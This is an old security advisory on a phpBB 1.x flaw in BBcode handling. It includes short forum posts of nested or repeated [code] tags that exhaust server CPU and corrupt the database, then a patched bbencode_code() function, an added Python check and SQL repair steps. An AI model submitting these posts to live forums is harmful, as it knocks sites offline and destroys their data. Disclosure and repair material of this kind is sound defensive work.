5th Apr 2002 [SBWID-5245]
COMMAND
phpBB DoS and database destruction
SYSTEMS AFFECTED
phpBB Group phpBB 1.4.4
phpBB Group phpBB 1.4.2
phpBB Group phpBB 1.4.1
phpBB Group phpBB 1.4.0
phpBB Group phpBB 1.2.1
phpBB Group phpBB 1.2.0
phpBB Group phpBB 1.0.0
Not tested:
phpBB Group phpBB 2.x
PROBLEM
In Whitecell Security Systems advisory WSS-Advisories-02003
[http://www.whitecell.org]:
WSS has found a vulnerability in phpBB when phpBB processes BBcode, which
could enable one user to DoS the system and destroy phpBB databases.
Description
===========
phpBB supports nested BBcode:
[code][/code], [quote][/quote], [list][/list]. Unfortunately, there is a
mistake in the BBcode processing in functions.php.
Exploit
=======
Submit the following post:
[code]
\0\0\0\0\0\0\0
[/code]
In fact, the following data has been saved to the database after BBcode
processing:
[1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1]
Submit the following post:
[code]'\0'*800[/code]
See the system:
whitecell$ top
PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND
8643 nobody 13 0 212M 81M 13604 D 8.0 65.7 0:07 httpd
phpBB error message:
Could not enter post text!
But in fact, two records have already been saved to the database. Now the
database is incomplete. If you browse the forum to see what you posted,
phpBB could report the message: "Could not connect to the forums database."
Submit 49 bytes of data:
[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]
Type top to see the CPU usage:
PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND
25741 nobody 14 0 11828 9996 416 R 99.9 7.8 2:38 httpd
Experiment environment:
linux 2.4.10 Apache/1.3.23 PHP 4.1.2
SOLUTION
Workaround
==========
1: Disable BBcode until the vendor fixes it.
2: Modify functions.php bbencode_code() as follows:
function bbencode_code($message, $is_html_disabled)
{
    // Single, non-recursive pass: each [code]...[/code] pair is wrapped once
    // (non-greedy match), so nested or repeated tags are never re-expanded.
    $message = preg_replace("/\[code\](.*?)\[\/code\]/si",
        "<!-- BBCode Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85><TR><TD>Code:<HR></TD></TR><TR><TD><PRE>\\1</PRE></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode End -->",
        $message);
    return $message;
} // bbencode_code()
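To check what the workaround actually buys, here is an added example (not phpBB code and not from the Whitecell advisory) that transcribes the workaround's preg_replace pattern and wrapper strings to Python and runs it over posts modelled on the ones in the advisory. The invariant it tests is the one the single-pass substitution restores: output size is input size plus a fixed cost per rendered block, so nested or repeated [code] tags cannot inflate what is stored or processed. The constants CODE_OPEN, CODE_CLOSE and OVERHEAD_PER_MATCH and the sample posts are constructed here, and "\0" in the samples is the two characters backslash and zero as in the advisory text.

```python
import re

# Added example: Python transcription of the advisory's bbencode_code() workaround.
# The HTML wrapper strings are copied from that workaround; the rest is constructed here.
CODE_OPEN = ("<!-- BBCode Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85>"
             "<TR><TD>Code:<HR></TD></TR><TR><TD><PRE>")
CODE_CLOSE = "</PRE></TD></TR><TR><TD><HR></TD></TR></TABLE><!-- BBCode End -->"

# Same pattern and flags as preg_replace("/\[code\](.*?)\[\/code\]/si", ...):
# non-greedy, dot matches newlines, case-insensitive, and not recursive.
CODE_RE = re.compile(r"\[code\](.*?)\[/code\]", re.S | re.I)

# Each match removes the two literal tags and adds the fixed HTML wrapper.
OVERHEAD_PER_MATCH = len(CODE_OPEN) + len(CODE_CLOSE) - len("[code][/code]")


def bbencode_code(message: str) -> str:
    """One pass over the message; a [code] tag inside a block stays plain text."""
    return CODE_RE.sub(lambda m: CODE_OPEN + m.group(1) + CODE_CLOSE, message)


def code_block_count(message: str) -> int:
    """Number of [code] blocks the single-pass substitution renders."""
    return len(CODE_RE.findall(message))


def output_is_linear(message: str) -> bool:
    """Defender's check: output length equals input length plus a fixed cost
    per rendered block, i.e. the body is never duplicated however it nests."""
    expected = len(message) + code_block_count(message) * OVERHEAD_PER_MATCH
    return len(bbencode_code(message)) == expected


# Constructed inputs modelled on the advisory's posts (raw strings, so r"\0"
# is backslash followed by zero, not a NUL byte).
FLAT_POST = "[code]" + r"\0" * 7 + "[/code]"
NESTED_POST = r"[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]"  # 49 bytes
LONG_POST = "[code]" + r"\0" * 800 + "[/code]"

if __name__ == "__main__":
    for name, post in (("flat", FLAT_POST), ("nested", NESTED_POST), ("long", LONG_POST)):
        out = bbencode_code(post)
        print(f"{name}: in={len(post)} out={len(out)} "
              f"blocks={code_block_count(post)} linear={output_is_linear(post)}")
```

With the nested 49-byte post, the non-greedy match runs from the first [code] to the first [/code], so exactly one block is rendered and the trailing "\0[/code]\0[/code]" is left as ordinary text; nothing is re-scanned or copied, which is the property the original nesting-aware code lacked.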
Database repair
===============
If the URL is http://host/forums/viewtopic.php?topic=1162&forum=1&0
you can use the following commands to repair it:
whitecell$ mysql -uuser -ppasswd
mysql> use databasename;
mysql> select * from topics where topic_id = 1162; -- note the post_id
mysql> delete from posts where post_id = 6280;
mysql> delete from posts_text where post_id = 6280;
mysql> delete from topics where topic_id = 1162;